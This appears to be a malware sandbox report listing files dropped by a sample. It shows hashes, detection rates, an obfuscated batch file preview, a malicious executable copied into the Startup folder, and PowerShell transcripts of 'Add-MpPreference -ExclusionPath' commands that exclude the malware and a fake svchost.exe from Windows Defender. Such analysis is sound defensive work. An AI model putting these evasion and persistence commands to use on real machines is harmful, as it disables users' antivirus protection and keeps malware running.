                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\d3617b11-5ec7-4976-90b8-7ee0bce6869f\test.bat
                                                                                                                  Process:C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\AdvancedRun.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):91000
                                                                                                                  Entropy (8bit):6.241345766746317
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:1536:JW3osrWjET3tYIrrRepnbZ6ObGk2nLY2jR+utQUN+WXim:HjjET9nX0pnUOik2nXjR+utQK+g3
                                                                                                                  MD5:17FC12902F4769AF3A9271EB4E2DACCE
                                                                                                                  SHA1:9A4A1581CC3971579574F837E110F3BD6D529DAB
                                                                                                                  SHA-256:29AE7B30ED8394C509C561F6117EA671EC412DA50D435099756BBB257FAFB10B
                                                                                                                  SHA-512:036E0D62490C26DEE27EF54E514302E1CC8A14DE8CE3B9703BF7CAF79CFAE237E442C27A0EDCF2C4FD41AF4195BA9ED7E32E894767CE04467E79110E89522E4A
                                                                                                                  Malicious:false
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: Metadefender, Detection: 3%
                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......oH..+)..+)..+)...&.))...&.9).....()...... )..+)...(......()......).....*).....*)..Rich+)..........................PE..L.....(_.........................................@..........................@..............................................L............a...........B..x!..........p...................................................<............................text...)........................... ..`.rdata.../.......0..................@..@.data...............................@....rsrc....a.......b..................@..@........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                  C:\Users\user\AppData\Local\Temp\f83f9cf5-aecc-448e-9e82-875f5c76499f\test.bat
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):8399
                                                                                                                  Entropy (8bit):4.665734428420432
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:192:XjtIefE/Qv3puaQo8BElNisgwgxOTkre0P/XApNDQSO8wQJYbZhgEAFcH8N:xIef2Qh8BuNivdisOyj6YboVF3N
                                                                                                                  MD5:B2A5EF7D334BDF866113C6F4F9036AAE
                                                                                                                  SHA1:F9027F2827B35840487EFD04E818121B5A8541E0
                                                                                                                  SHA-256:27426AA52448E564B5B9DFF2DBE62037992ADA8336A8E36560CEE7A94930C45E
                                                                                                                  SHA-512:8ED39ED39E03FA6D4E49167E8CA4823E47A221294945C141B241CFD1EB7D20314A15608DA3FAFC3C258AE2CFC535D3E5925B56CACEEE87ACFB7D4831D267189E
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: @%nmb%e%lvjgxfcm%c%qckbdzpzhfjq%h%anbajpojymsco%o%nransp% %aqeoe%o%mitd%f%puzu%f%bjs%..%fmmjryur%s%ukdtxiqneflfe%c%toqs% %xbvjy%s%ykctzeltrurlx%t%xdvrvty%o%tutofjebvoygco%p%noaevpkwrrrcf% %npfksd%w%ljconeph%i%sinxiygfbc%n%ykxnbrpdqztrdb%d%mfuvueeajpyxla%e%ewyybmmo%f%jdztigyb%e%izwgzizuwfwq%n%slmffy%d%azh%..%wlhzjhxuz%s%zuiczqrqav%c%ocphncbzosf% %uee%c%kwrr%o%ofppkctzbccubb%n%oyhovbqs%f%nue%i%lgybsrbqk%g%xguast% %vas%w%tdayskzhki%i%fmmjryurgrdcz%n%emroplriim%d%ymxvyr%e%iqpwnheoi%f%ffehbxrlehlo%e%tutofjebvo%n%ywjkif%d%pvdaa% %trpa%s%xznydsnqgdbu%t%hplrbjxhnjes%a%yhyferx%r%dwcez%t%rrugvyblp%=%zjthdesmo% %ewyybmmowgsjdr%d%snmn%i%mbm%s%akxnoc%a%xar%b%mwm%l%ozlt%e%wlhzjhxuzh%d%roqtalnv%..%hlhdhvi%s%nsespdzm%c%kwrrsgvucidm% %ueax%s%xunijsdqhif%t%prvhhnqvvouz%o%liyjprtqxuur%p%jskzmuaxtb% %vwoqshkaaladz%S%ruuosytlcgu%e%nftvippqc%n%qhj%s%llxrmrlqje%e%tutofje%..%xxnqgsvqut%s%racqhzwreqndv%c%skizikcom% %ytf%c%pxdixotcxymnev%o%dwcezzifyaqd%n%jjdpztfrehpv%f%xxrweg%i%lpfkfswxzemf%g%rxycnmibql% %hfzbr
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):780216
                                                                                                                  Entropy (8bit):6.549487890523401
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:12288:nZB49aHTQB923OmSCOKO9W7P80EEAYFAfxQBdY3srne2P40ssuf2iNaL7X:nZ+Gq923OUbPp9AA/TeU41sU1Y/X
                                                                                                                  MD5:0CECFA83EE6EA6DD1DE38462BBEDF15C
                                                                                                                  SHA1:DE4DDE34707658D98F50DE8CF2A182BF7DED2A45
                                                                                                                  SHA-256:A6BDCE859B5373990681D6ED6C6133A80330FA2744EA9C1E88018D03AB77FEB2
                                                                                                                  SHA-512:CEDFCB1FBBCFC9C0592D346295C1225B926D4C7246A81F98CB4E50007629C4F60DEB9C1F8A539C353835D1213F2C291D81996B6F327A27DAD38E4B1E4BCEDD86
                                                                                                                  Malicious:true
                                                                                                                  Antivirus:
                                                                                                                  • Antivirus: ReversingLabs, Detection: 44%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0.................. ........@.. .......................@............`.................................$...J.......H.................... ......n...8............................................ ............... ..H............text........ ...................... ..`.rsrc...H...........................@..@.reloc....... ......................@..@................T.......H.......................4...n............................................V..m3Q..L9.FM>....Fzq.Z..._...b...^....2..!.\..UQU...v...L..........T}3.3c...=(.p.X....-.U9.^.m..W..!...j.....qI...c'..!.5.5e(6&<..F*.8............a....U4..8k.i.....y..=.f..k..$...wT....bh./.Y"`@...W...l0?.....{...:}......O.Z#....!....y.A.6.zN.gD...y.j...[...*.@8.V.e.iz...!...7u...V.q..}P..L..)..... .8....^.i.Y-t....^....~`.eH;.E...T..Wq*._.."...ynN.@MH@...($...<..;{..g#Q...@.Ws...R..C
                                                                                                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe:Zone.Identifier
                                                                                                                  Process:C:\Users\user\Desktop\VknMvPoCXZ.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):26
                                                                                                                  Entropy (8bit):3.95006375643621
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:ggPYV:rPYV
                                                                                                                  MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                  SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                  SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                  SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                  Malicious:true
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: [ZoneTransfer]....ZoneId=0
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.1BWqT5MQ.20210915152050.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.398828126636718
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZn/GN0LqDo1Z8eZnZ/GN0LqDo1ZVV4z+zQzjZX/GN0LqDo1ZJ5zAzAzyZx:x13
                                                                                                                  MD5:B15F614B0471F176EFB6F7630773048B
                                                                                                                  SHA1:5F97F115867D89C9FAF09955AEFFD7437F6171C8
                                                                                                                  SHA-256:036E8AF2D6FB9344AD8A6C5560D6C442C1C49C4AA6A5F03B99626E0090C1E809
                                                                                                                  SHA-512:45219D52248094B3CD9876B84881CB082FCADD01350DBF2CFDFB58FEF9F997D113289F8D9B2B274736CA56DE34FCAFE1DEEDE3F420715D2A2E9026DFA17D3964
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152052..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..Process ID: 2196..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152052..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152605..Username: computer\user..RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.RiCjU3CB.20210915152105.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5879
                                                                                                                  Entropy (8bit):5.377611337291585
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GNQAqDo1ZFeZB/GNQAqDo1Zr8vE+vEEvEjZCS/GNQAqDo1ZYGvvE0vE0vEy0:Ob/7GyppT0
                                                                                                                  MD5:F724E4C3720803E5FFA61B24FA414F72
                                                                                                                  SHA1:714A38EDE8D10FE988321DEAB63A668D3F5974E1
                                                                                                                  SHA-256:FBA9CFDE2C292FB013E5A6BB0A962829064FF184E2217646F04B424F5A7EAB7F
                                                                                                                  SHA-512:FE248FDBF57B046939928A0A18E8D2DD32388DA4CED1C95FFF08E03BE4946B38F0CDD27DACC2B517CA007B3CE5B46C3074CE83E554CFF8D4C8A68143955FD1CA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6748..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152353..Username: DESKTOP-716
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.Vuu9YzJB.20210915152106.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5879
                                                                                                                  Entropy (8bit):5.375814590595939
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GNQVqDo1ZFeZ//GNQVqDo1Z+8vE+vEEvEjZz/GNQVqDo1ZyvvE0vE0vE4Z/:jb/9ppH
                                                                                                                  MD5:12E8ED4AD3974E4B99B309DFA27FAC17
                                                                                                                  SHA1:EC930ADCFBBF2717C452557EE84EAD0A8ACB5EAC
                                                                                                                  SHA-256:4087655714E431A4412B1C1C8EF8DCB2A775264A414C07C51DC0B1FD35391756
                                                                                                                  SHA-512:E65945D8F98D94874332F6CC87DE1C06F9B662CF65F557EC4FA2DD6D8393663F11C3CA4F53D8EED990DEC5FC93D678AB5D1D2B408441C2B2106C07D057E4376F
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview: .**********************..Windows PowerShell transcript start..Start time: 20210915152109..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 928100 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..Process ID: 6828..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20210915152109..**********************..PS>Add-MpPreference -ExclusionPath C:\Windows\Resources\Themes\aero\Shell\4B6A7152\svchost.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20210915152412..Username: DESKTOP-716
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.cMiMRTOx.20210915152053.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3800
                                                                                                                  Entropy (8bit):5.335036846510616
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZsZ/GN7dqDo1ZOXrSpZF/GN7dqDo1Zfq/m0cm0cm02Zh:g7dyyp
                                                                                                                  MD5:B4CD5A7CB3EC649B1EEB90E0AEDE25E5
                                                                                                                  SHA1:7C495D64F90F7EB2AA89D825B31A57CBD374B09B
                                                                                                                  SHA-256:25BEE175151AD7F1CF6D109F869A899A54B76195D6A1C5AB1874289BACFC4A0B
                                                                                                                  SHA-512:1717BFC21617347521A8A3DC9557006BE29EF9CB7C05ABEF7394318AC91E56BCF662254FBFB86118613A7026B8609386C961228D1702745D129FCF2F747BAAA9
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152055
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\user
                                                                                                                  Configuration Name:
                                                                                                                  Machine: 928100 (Microsoft Windows NT 10.0.17134.0)
                                                                                                                  Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force
                                                                                                                  Process ID: 1036
                                                                                                                  PSVersion: 5.1.17134.1
                                                                                                                  PSEdition: Desktop
                                                                                                                  PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                                                                                  BuildVersion: 10.0.17134.1
                                                                                                                  CLRVersion: 4.0.30319.42000
                                                                                                                  WSManStackVersion: 3.0
                                                                                                                  PSRemotingProtocolVersion: 2.3
                                                                                                                  SerializationVersion: 1.1.0.1
                                                                                                                  **********************
                                                                                                                  **********************
                                                                                                                  Command start time: 20210915152055
                                                                                                                  **********************
                                                                                                                  PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force
                                                                                                                  **********************
                                                                                                                  Command start time: 2021
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.fN_Cx1KH.20210915152048.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.399822672423884
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZ7/GN0sqDo1ZUeZs/GN0sqDo1Zu4z+zQzjZn/GN0sqDo1ZZ5zAzAzTZz:n
                                                                                                                  MD5:DB644147D05DC4A8BA2A5AB2513E0EB9
                                                                                                                  SHA1:5E2F506D4A6B09859A9343EB5E3E61D070AAE3CC
                                                                                                                  SHA-256:091C3BB1A1498529A68C6E0AD657CAD90583059454D9FDB09E1CFF292F034388
                                                                                                                  SHA-512:372C164B26DDB4AC73A2E52AABC4AF575BE1E317A17ECEED25F79851C23CBA71228F66AE3880F005C7EB139F9BD9A40B7E449F0E9A506CA43ACFB38EB9E1B2BF
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152049
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\user
                                                                                                                  Configuration Name:
                                                                                                                  Machine: 928100 (Microsoft Windows NT 10.0.17134.0)
                                                                                                                  Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force
                                                                                                                  Process ID: 2968
                                                                                                                  PSVersion: 5.1.17134.1
                                                                                                                  PSEdition: Desktop
                                                                                                                  PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                                                                                  BuildVersion: 10.0.17134.1
                                                                                                                  CLRVersion: 4.0.30319.42000
                                                                                                                  WSManStackVersion: 3.0
                                                                                                                  PSRemotingProtocolVersion: 2.3
                                                                                                                  SerializationVersion: 1.1.0.1
                                                                                                                  **********************
                                                                                                                  **********************
                                                                                                                  Command start time: 20210915152049
                                                                                                                  **********************
                                                                                                                  PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152400
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\a
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.jKue+ViU.20210915152052.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):3800
                                                                                                                  Entropy (8bit):5.337268833501308
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZd/GN7zqDo1ZRRpZP/GN7zqDo1ZIq/m0cm0cm0oZP:eyyZ
                                                                                                                  MD5:0089AE0D1D8FA20227C93299693DB26A
                                                                                                                  SHA1:1549B1FAF6E0E6C37425949D8AAF9C92B045E5E9
                                                                                                                  SHA-256:EACCA5E385F835F41A0B3FE5EC2CE7EC5825E15A4584DFC4E5AF697CAA26AA62
                                                                                                                  SHA-512:F1C0FD3769D518A2345A61F0D1F9DD70B46F381E80C1B125AF6A739B6358E0C7D0480040570522D4006CD195D33C9601FC6DBAC5A3749E9743F52C645B2B7A8C
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152054
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\user
                                                                                                                  Configuration Name:
                                                                                                                  Machine: 928100 (Microsoft Windows NT 10.0.17134.0)
                                                                                                                  Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force
                                                                                                                  Process ID: 5456
                                                                                                                  PSVersion: 5.1.17134.1
                                                                                                                  PSEdition: Desktop
                                                                                                                  PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                                                                                  BuildVersion: 10.0.17134.1
                                                                                                                  CLRVersion: 4.0.30319.42000
                                                                                                                  WSManStackVersion: 3.0
                                                                                                                  PSRemotingProtocolVersion: 2.3
                                                                                                                  SerializationVersion: 1.1.0.1
                                                                                                                  **********************
                                                                                                                  **********************
                                                                                                                  Command start time: 20210915152054
                                                                                                                  **********************
                                                                                                                  PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\481F404B.exe -Force
                                                                                                                  **********************
                                                                                                                  Command start time: 2021
                                                                                                                  C:\Users\user\Documents\20210915\PowerShell_transcript.928100.uTd+oL9Y.20210915152105.txt
                                                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                  File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):5795
                                                                                                                  Entropy (8bit):5.4003906307965535
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:96:BZI/GN0rqDo1ZreZe/GN0rqDo1ZxN4z+zQzjZ1/GN0rqDo1Zw5zAzAzyZN:2g
                                                                                                                  MD5:D0418EEA6E506488A09F65A3AF9623CE
                                                                                                                  SHA1:6C3CB13E6AB71365C568E072F4CBBB1BEE4D6FC3
                                                                                                                  SHA-256:4819856AF3763A3D4CAAEA94B16F94DB7756E08243BF882BE108708D31384186
                                                                                                                  SHA-512:8CEEC55383CFFEE1B21388EBE2762F11424487306174D8EC867038DE5943527A5258AE9A2DEDF351B8806C185A7A0F7B103AD9588EE31F30F05B17A4379A96E5
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:
                                                                                                                  **********************
                                                                                                                  Windows PowerShell transcript start
                                                                                                                  Start time: 20210915152109
                                                                                                                  Username: computer\user
                                                                                                                  RunAs User: computer\user
                                                                                                                  Configuration Name:
                                                                                                                  Machine: 928100 (Microsoft Windows NT 10.0.17134.0)
                                                                                                                  Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\VknMvPoCXZ.exe -Force
                                                                                                                  Process ID: 6804
                                                                                                                  PSVersion: 5.1.17134.1
                                                                                                                  PSEdition: Desktop
                                                                                                                  PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1
                                                                                                                  BuildVersion: 10.0.17134.1
                                                                                                                  CLRVersion: 4.0.30319.42000
                                                                                                                  WSManStackVersion: 3.0
                                                                                                                  PSRemotingProtocolVersion: 2.3
                                                                                                                  SerializationVersion: 1.1.0.1
                                                                                                                  **********************
                                                                                                                  **********************
                                                                                                                  Command start time: 20210915152109
                                                                                                                  **********************
